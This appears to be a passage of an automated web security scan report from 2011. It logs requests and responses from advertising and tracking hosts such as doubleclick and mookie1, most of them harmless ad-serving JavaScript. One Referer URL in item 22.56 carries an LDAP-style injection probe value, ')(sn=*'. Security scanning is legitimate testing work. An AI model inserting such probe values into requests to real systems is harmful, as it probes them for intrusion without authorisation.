document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=860849269?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=860849269?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

22.53. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1528833724?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1528833724/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1528833724?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1528833724/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1528833724?
http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1528833724/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1528833724?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:27:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1528833724/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1528833724?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1528833724/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1528833724?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1528833724/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1528833724?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1528833724?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

22.54. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=72207368?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/72207368/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=72207368?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/72207368/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=72207368?
http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/72207368/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=72207368?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:41:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3174
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/72207368/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=72207368?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/72207368/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=72207368?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/72207368/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=72207368?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=72207368?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

22.55. http://ccc01.opinionlab.com/o.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ccc01.opinionlab.com
Path:	/o.asp

Issue detail

The page was loaded from a URL containing a query string:

http://ccc01.opinionlab.com/o.asp?id=swHtlTXj

The response contains the following link to another domain:

http://go.microsoft.com/fwlink/?LinkID=74170

Request

GET /o.asp?id=swHtlTXj HTTP/1.1
Host: ccc01.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.56. http://cdn.lib.newsvine.com/_static/js/d57b389e60d7c68b274fdadecdd0b4f51248430e.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.lib.newsvine.com
Path:	/_static/js/d57b389e60d7c68b274fdadecdd0b4f51248430e.js

Issue detail

The page was loaded from a URL containing a query string:

http://cdn.lib.newsvine.com/_static/js/d57b389e60d7c68b274fdadecdd0b4f51248430e.js?v=23247

The response contains the following links to other domains:

http://digg.com/search?s=msnbc.redacted
http://msnbcmedia.redacted/i/MSNBC/Templates/Page%20Templates/Elements/toolbar/panel_whatsnew_1.png
http://msnbcmedia.redacted/i/MSNBC/Templates/Page%20Templates/Elements/toolbar/panel_whatsnew_2.png
http://msnbcmedia.redacted/i/MSNBC/Templates/Page%20Templates/Elements/toolbar/panel_whatsnew_3.png
http://msnbcmedia.redacted/i/NBCSports/SiteManagement/Scoreboards/horiz/scoreboard_horiz.swf?domain=nbcsports.msnbc.com&
http://msnbcmedia.redacted/i/msnbc/Components/ColorBoxes/Styles/ColorBoxImages_GlobalOnlyPlease/wl.gif
http://msnbcmedia.redacted/i/msnbc/Components/ColorBoxes/Styles/ColorBoxImages_GlobalOnlyPlease/xmlIcon.gif
http://my.redacted/addtomymsn.armx?id=rss&ut='+D[i].getAttribute(
http://search.twitter.com/search?q=$1
http://tk2.stc.s-redacted/br/mymsn/logo/addtomymsn.us.png
http://twitter.com/$1
http://twitter.com/'+B+'
http://twitter.com/'+C+
http://twitter.com/'+C+'
http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif
http://us.rd.yahoo.com/my/atm/MSNBC/Top20News/*http:/add.my.yahoo.com/rss?url='+D[i].getAttribute(
http://www.bloglines.com/images/sub_modern11.gif
http://www.bloglines.com/sub/'+D[i].getAttribute(
http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FLifeIncBlog&width=220&colorscheme=light&connections=00&stream=false&header=false&height=60
http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FTODAYs-Kitchen%2F363939277982%3Fref%3Dts&width=230&connections=0&stream=false&header=false&height=70
http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FToday-Money%2F152222541478430&width=230&connections=0&stream=false&header=false&height=68
http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Ftodayshow%3Fref%3Dts&width=230&connections=0&stream=false&header=false&height=70

Request

GET /_static/js/d57b389e60d7c68b274fdadecdd0b4f51248430e.js?v=23247 HTTP/1.1
Host: cdn.lib.newsvine.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Fri, 28 Jan 2011 21:50:14 GMT
ETag: "2e386a3-16f3c-49aef0d123180"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=1309
Expires: Sun, 30 Jan 2011 01:39:28 GMT
Date: Sun, 30 Jan 2011 01:17:39 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 94012

/*v2643: 2011-01-28T13:50:14*/
if(typeof Pierre=="undefined"){var Pierre={}}else{}Pierre.namespace=function(){var A=arguments,E=null,C,B,D;for(C=0;C<A.length;C=C+1){D=A[C].split(".");E=Pierre;for(B=(D
...[SNIP]...
<div id="digg-widget-1275955318096"><a href="http://digg.com/search?s=msnbc.redacted">See more msnbc.redacted stories on Digg.com</a>
...[SNIP]...
book.net/en_US/all.js";document.getElementById("fb-root").appendChild(C)};this.buildPanel=function(){var B=this.wetbar.articleData;var E=$_CE("div",{className:"col1_5"},this.panelElement);E.innerHTML='<iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Ftodayshow%3Fref%3Dts&width=230&connections=0&stream=false&header=false&height=70" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:230px; height:70px;bottom-border:1px solid #ccc;" allowTransparency="true"></iframe>';var D=$_CE("div",{className:"col1_5"},this.panelElement);D.innerHTML='<iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FTODAYs-Kitchen%2F363939277982%3Fref%3Dts&width=230&connections=0&stream=false&header=false&height=70" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:230px; height:70px;" allowTransparency="true"></iframe>';var C=$_CE("div",{className:"col1_5"},this.panelElement);C.innerHTML='<iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FToday-Money%2F152222541478430&width=230&connections=0&stream=false&header=false&height=68" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:230px; height:68px;" allowTransparency="true"></iframe>';var A=$_CE("div",{className:"col1_5"},this.panelElement);A.innerHTML='<iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FLifeIncBlog&width=220&colorscheme=light&connections=00&stream=false&header=false&height=60" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:220px; height:60px;" allowTransparency="true"></iframe>
...[SNIP]...
<a title="Add to Windows Live" href="http://my.live.com/?add='+D[i].getAttribute("href")+'" target="_blank"><img border="0" alt="Add to Windows Live" src="http://msnbcmedia.redacted/i/msnbc/Components/ColorBoxes/Styles/ColorBoxImages_GlobalOnlyPlease/wl.gif"/></a>';$_CE("span",{className:"myyahoo"},B).innerHTML='<a title="Add to My Yahoo!" href="http://us.rd.yahoo.com/my/atm/MSNBC/Top20News/*http://add.my.yahoo.com/rss?url='+D[i].getAttribute("href")+'" target="_blank"><img border="0" alt="Add to My Yahoo!" src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif"/></a>';$_CE("span",{className:"mymsn"},B).innerHTML='<a title="Add to My MSN" href="http://my.redacted/addtomymsn.armx?id=rss&ut='+D[i].getAttribute("href")+'" target="_blank"><img border="0" src="http://tk2.stc.s-msn.com/br/mymsn/logo/addtomymsn.us.png" alt="Add to My MSN"/></a>';$_CE("span",{className:"bloglines"},B).innerHTML='<a title="Subscribe with Bloglines" href="http://www.bloglines.com/sub/'+D[i].getAttribute("href")+'" target="_blank"><img border="0" alt="Subscribe with Bloglines" src="http://www.bloglines.com/images/sub_modern11.gif"/></a>
...[SNIP]...
<a title="XML" href="'+D[i].getAttribute("href")+'" target="_blank"><img border="0" alt="XML" src="http://msnbcmedia.redacted/i/msnbc/Components/ColorBoxes/Styles/ColorBoxImages_GlobalOnlyPlease/xmlIcon.gif"/></a>
...[SNIP]...
dPanel=function(){plib.Dom.createElement("div",{className:"col1"},this.panelElement).innerHTML=" ";div=plib.Dom.createElement("div",{className:"col4 scoreboard"},this.panelElement);div.innerHTML='<embed height="72" align="top" width="582" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" allowscriptaccess="always" seamlesstabbing="true" allowfullscreen="false" wmode="transparent" devicefont="false" menu="false" id="fl25940053" name="fl25940053" mayscript="" salign="tl" scale="noborder" quality="Best" bgcolor="#ffffff" loop="true" play="true" swliveconnect="TRUE" src="http://msnbcmedia.redacted/i/NBCSports/SiteManagement/Scoreboards/horiz/scoreboard_horiz.swf?domain=nbcsports.msnbc.com&">';plib.Dom.createElement("div",{className:"col1"},this.panelElement).innerHTML=" "}});Pierre.widgets.wetbar.Tracker=function(){Pierre.widgets.wetbar.Control.superclass.constructor.call(this)};Pier
...[SNIP]...
etSent.call(A,E,D)}})})};this.handleAuthComplete=function(A){this.handleTwitterUser(A.currentUser)};this.handleTwitterUser=function(A){if(A){var B=A.data("screen_name");this.usernameSpan.innerHTML='as <a target="twitter" href="http://twitter.com/'+B+'">@'+A.data("screen_name")+"</a>
...[SNIP]...
</a>').replace(/@+([_A-Za-z0-9-]+)/ig,'<a href="http://twitter.com/$1" target="_blank">@$1</a>').replace(/#+([_A-Za-z0-9-]+)/ig,'<a href="http://search.twitter.com/search?q=$1" target="_blank">#$1</a>
...[SNIP]...
</a>').replace(/@+([_A-Za-z0-9-]+)/ig,'<a href="http://twitter.com/$1" target="_blank">@$1</a>').replace(/#+([_A-Za-z0-9-]+)/ig,'<a href="http://search.twitter.com/search?q=$1" target="_blank">#$1</a>
...[SNIP]...
</div>');var D="http://twitter.com/status/user_timeline/"+C+".json?count=1&callback=?";$.getJSON(D,function(F){E=E(F[0].created_at);E='<a href="http://twitter.com/'+C+"/status/"+F[0].id+'">'+E+"</a>";$("#"+C+"_wetbar .username").append("@"+C);$("#"+C+"_wetbar .tweet").append(A(F[0].text));$("#"+C+"_wetbar .tweetTime").append(E);$("#"+C+"_wetbar .followTweets").append('<a href="http://twitter.com/'+C+'">Follow @'+C+" on Twitter</a>
...[SNIP]...
el.call(this)};this.buildPanel=function(){var K=plib.Dom.createElement("div",{className:"col1_5 icons"},this.panelElement);var C=plib.Dom.createElement("div",{className:"whatsnew_image"},K).innerHTML='<img alt="Think big" src="http://msnbcmedia.redacted/i/MSNBC/Templates/Page%20Templates/Elements/toolbar/panel_whatsnew_1.png" width="99" height="62" border="0" />';var I=plib.Dom.createElement("div",{className:"whatsnew_text"},K).innerHTML="<h3>
...[SNIP]...
er photos. Bigger text. Bigger stories.";var E=plib.Dom.createElement("div",{className:"col1_5 access"},this.panelElement);var H=plib.Dom.createElement("div",{className:"whatsnew_image"},E).innerHTML='<img alt="Zoom out" src="http://msnbcmedia.redacted/i/MSNBC/Templates/Page%20Templates/Elements/toolbar/panel_whatsnew_2.png" width="51" height="67" border="0" />';var F=plib.Dom.createElement("div",{className:"whatsnew_text"},E).innerHTML="<h3>
...[SNIP]...
down for a dashboard view of the news.";var B=plib.Dom.createElement("div",{className:"col1_5 sharing"},this.panelElement);var G=plib.Dom.createElement("div",{className:"whatsnew_image"},B).innerHTML='<img alt="Share more" src="http://msnbcmedia.redacted/i/MSNBC/Templates/Page%20Templates/Elements/toolbar/panel_whatsnew_3.png" width="78" height="73" border="0" />';var J=plib.Dom.createElement("div",{className:"whatsnew_text"},B).innerHTML="<h3>
...[SNIP]...
el.call(this)};this.buildPanel=function(){var K=plib.Dom.createElement("div",{className:"col1_5 icons"},this.panelElement);var C=plib.Dom.createElement("div",{className:"whatsnew_image"},K).innerHTML='<img alt="Think big" src="http://msnbcmedia.redacted/i/MSNBC/Templates/Page%20Templates/Elements/toolbar/panel_whatsnew_1.png" width="99" height="62" border="0" />';var I=plib.Dom.createElement("div",{className:"whatsnew_text"},K).innerHTML="<h3>
...[SNIP]...
er photos. Bigger text. Bigger stories.";var E=plib.Dom.createElement("div",{className:"col1_5 access"},this.panelElement);var H=plib.Dom.createElement("div",{className:"whatsnew_image"},E).innerHTML='<img alt="Zoom out" src="http://msnbcmedia.redacted/i/MSNBC/Templates/Page%20Templates/Elements/toolbar/panel_whatsnew_2.png" width="51" height="67" border="0" />';var F=plib.Dom.createElement("div",{className:"whatsnew_text"},E).innerHTML="<h3>
...[SNIP]...
down for a dashboard view of the news.";var B=plib.Dom.createElement("div",{className:"col1_5 sharing"},this.panelElement);var G=plib.Dom.createElement("div",{className:"whatsnew_image"},B).innerHTML='<img alt="Share more" src="http://msnbcmedia.redacted/i/MSNBC/Templates/Page%20Templates/Elements/toolbar/panel_whatsnew_3.png" width="78" height="73" border="0" />';var J=plib.Dom.createElement("div",{className:"whatsnew_text"},B).innerHTML="<h3>
...[SNIP]...

22.57. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=audsci

The response contains the following link to another domain:

http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEFlfd-sZ8CX6_Cz86QSvO_0&cver=1

Request

GET /pixel?nid=audsci HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Found
Location: http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEFlfd-sZ8CX6_Cz86QSvO_0&cver=1
Date: Sun, 30 Jan 2011 01:29:45 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 341
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEFlfd-sZ8CX6_Cz86QSvO_0&cver=1">here</A>
...[SNIP]...

22.58. http://cms.ad.yieldmanager.net/v1/cms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cms.ad.yieldmanager.net
Path:	/v1/cms

Issue detail

The page was loaded from a URL containing a query string:

http://cms.ad.yieldmanager.net/v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578

The response contains the following link to another domain:

http://cookex.amp.yahoo.com/v2/cexposer/SIG=13ahi2098/*http:/cms.ad.yieldmanager.net/v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578

Request

GET /v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578 HTTP/1.1
Host: cms.ad.yieldmanager.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:07:53 GMT
Location: http://cookex.amp.yahoo.com/v2/cexposer/SIG=13ahi2098/*http%3A//cms.ad.yieldmanager.net/v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 411

